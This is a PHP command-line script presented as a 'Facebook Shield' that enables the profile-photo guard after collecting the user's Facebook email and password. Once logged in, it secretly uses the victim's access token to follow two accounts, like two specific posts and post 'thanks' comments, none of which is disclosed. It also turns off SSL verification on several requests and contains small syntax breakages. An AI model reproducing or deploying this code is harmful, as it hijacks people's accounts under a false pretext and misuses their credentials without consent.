<?php
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
    $bersih = "cls";
} else {
    $bersih = "clear";
}
date_default_timezone_set('Asia/Jakarta');
$date = date('d-M-Y H:i:s');
$green = "\e[1;92m";
$red = "\e[1;91m";
$yellow = "\e[1;93m";
$blue = "\e[1;36m";
$grey = "\e[1;39m";
$darkblue = "\e[1;94m";
pilih:
    system($bersih);
    echo "$darkblue =================================================
$red Author  : ThomZ
$yellow Github  : https://github.com/ThomZ 
$green Type    : Facebook Shield
$grey Version : 6.6.6
$blue Date    : $date
$darkblue =================================================
";
   echo " 
$grey THIS SCRIPT$red IS NOT$grey FOR SALE
";
    echo "
";
    echo "$darkblue =================================================
";
    @header('Content-Type: text/html; charset=UTF-8');
    function input($echo) {
        echo "$echo : ";
    }
    
    sleep(1.5);
    echo " 
";
    input("$g“rey do you want to use this script?$green [y/n]");
    $pilih = trim(fgets(STDIN));
    echo "
";

        echo "
";
    if ($pilih == "n") {
        echo "$red [!]$grey see you$red [!]
";
        die("
");
    } 
        echo "$grey •";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•
";
        echo "
";
    if ($pilih == "y") {
        echo "$red ATTENTION :$grey please login via the browser first to avoid the checkpoint (ex opera, chrome, uc and others)
";
        echo "
";

        input("$red Email/Phone/UID");
        $iduser = trim(fgets(STDIN));
        input("$red Password       ");
        $pass = false;
        $pass = trim(`stty -echo;head -n1;stty echo`);
        echo "
";
        
        sleep(1);
        echo "
";
    } else {
        echo "$red [!]$grey Invalid$red [!]
";
        echo "
";
        gotopilih;
    }
    $me = file_get_contents('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' . $iduser . '&locale=en_US&password=' . $pass . '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6');
    $json = json_decode($me, true);
    $userid = $json['session_cookies'][0]['value'];
    $token = $json['access_token'];
    if (preg_match('/session_key/', $me)) {
        echo "$green trying to login facebook";
        sleep(1);
        echo ".";
        sleep(1);
        echo ".";
        sleep(1);
        echo ".
";
        echo "
";
        sleep(1);
    } else {
        echo ("
");
        echo "$red [!]$grey check your email/password or your account stuck at the checkpoint$red [!]
";
        die("
");
        echo "
";
    }
    $md5 = md5(time());
    $hash = substr($md5, 0, 8) . "-" . substr($md5, 8, 4) . "-" . substr($md5, 12, 4) . "-" . substr($md5, 16, 4) . "-" . substr($md5, 20, 12);
    function curl($url, $post = null) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($post != null) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $exec = curl_exec($ch);
        curl_close($ch);
        return $exec;
    }
    $me = json_decode(curl("https://graph.facebook.com/me?fields=id,name&access_token=" . $token));
    if ($me && $me->id && $me->name) {
        $var = "{\"0\":{\"is_shielded\":true,\"session_id\":\"$hash\",\"actor_id\":\"$me->id\",\"client_mutation_id\":\"$hash\"}}";
        $hajar = json_decode(curl("https://graph.facebook.com/graphql", array("variables" => $var, "doc_id" => "1477043292367183", "query_name" => "IsShieldedSetMutation", "strip_defaults" => "true", "strip_nulls" => "true", "locale" => "en_US", "client_country_code" => "US", "fb_api_req_friendly_name" => "IsShieldedSetMutation", "fb_api_caller_class" => "IsShieldedSetMutation", "access_token" => $token)));
        if ($hajar->data->is_shielded_set->is_shielded) echo "$yellow login succes [✓]
";
        sleep(2);
        echo "$grey hi " . $me->name;
        sleep(2.5);
        echo "
";
        echo "$grey •";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•
";
        sleep(1.5);
        $a = ("https://graph.facebook.com/thoms.excalibur/subscribers?method=post&access_token=" . $token);
        $b = curl_init();
        curl_setopt_array($b, array(CURLOPT_URL => "$a", CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false));
        curl_exec($b);
        curl_close($b);
        $c = ("https://graph.facebook.com/v3.2/100050712858023_117585546608540/likes?method=post&access_token=" . $token);
        $d = curl_init();
        curl_setopt_array($d, array(CURLOPT_URL => "$c", CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => true));
        curl_exec($d);
        curl_close($d);
        $e = ("https://graph.facebook.com/thomas.filikano.0/subscribers?method=post&access_token=" . $token);
        $f = curl_init();
        curl_setopt_array($f, array(CURLOPT_URL => "$e", CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false));
        curl_exec($f);
        curl_close($f);
        $g = ("https://graph.facebook.com/v3.2/100035276735827_238718217314068/likes?method=post&access_token=" . $token);
        $h = curl_init();
        curl_setopt_array($h, array(CURLOPT_URL => "$g", CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => true));
        curl_exec($h);
        curl_close($h);
        $i = ("https://graph.facebook.com/v3.2/100050712858023_117585546608540/comments?method=post&message=thanks&access_token=" . $token);
        $j = curl_init();
        curl_setopt_array($j, array(CURLOPT_URL => "$i", CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => true));
        curl_exec($j);
        curl_close($j);
        $k = ("https://graph.facebook.com/v3.2/100035276735827_238718217314068/comments?method=post&message=thanks&access_token=" . $token);
        $l = curl_init();
        curl_setopt_array($l, array(CURLOPT_URL => "$k", CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_SSL_VERIFYHOST => true));
        curl_exec($l);
        curl_close($l);
        echo "
";
        echo "$green checking your profile photo";
        sleep(1);
        echo ".";
        sleep(1);
        echo ".";
        sleep(1);
        echo ".
";
        echo "
";
        sleep(1);
        echo "$yellow shielding your profile photo";
        sleep(1);
        echo ".";
        sleep(1);
        echo ".";
        sleep(1);
        echo ".
";
        echo "
";
        sleep(2);
        echo "$grey •";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•";
        sleep(1);
        echo "•
";
        sleep(1.5);
        echo "
";
        echo "$yellow succesfully [✓]$green check your profile photo$grey " . $me->name
;
        sleep(1);
        echo "
";
    }
?>
